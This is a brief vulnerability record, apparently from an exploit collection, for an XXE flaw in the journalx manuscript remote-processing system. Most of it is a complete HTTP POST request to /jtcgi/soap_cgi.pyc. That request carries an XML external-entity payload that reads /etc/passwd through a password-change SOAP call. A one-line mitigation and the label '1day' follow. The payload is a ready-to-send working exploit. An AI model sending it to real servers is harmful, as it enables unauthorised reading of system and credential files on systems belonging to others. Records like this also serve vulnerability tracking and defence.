vendor = "journalx"
name = "journalx稿件远程处理系统XXE漏洞"
type = "XXE"
version = "未知"
path = "/jtcgi/soap_cgi.pyc"
detail = "POST /jtcgi/soap_cgi.pyc HTTP/1.1 Host: User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36 Content-Type: application/xml <?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM \"file:///etc/passwd\">]><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>zzz</curpwd><newpwd>zzz123</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>"
fix = "WAF封禁路路径，等待发布补丁"
date = "0809"
label = "1day"
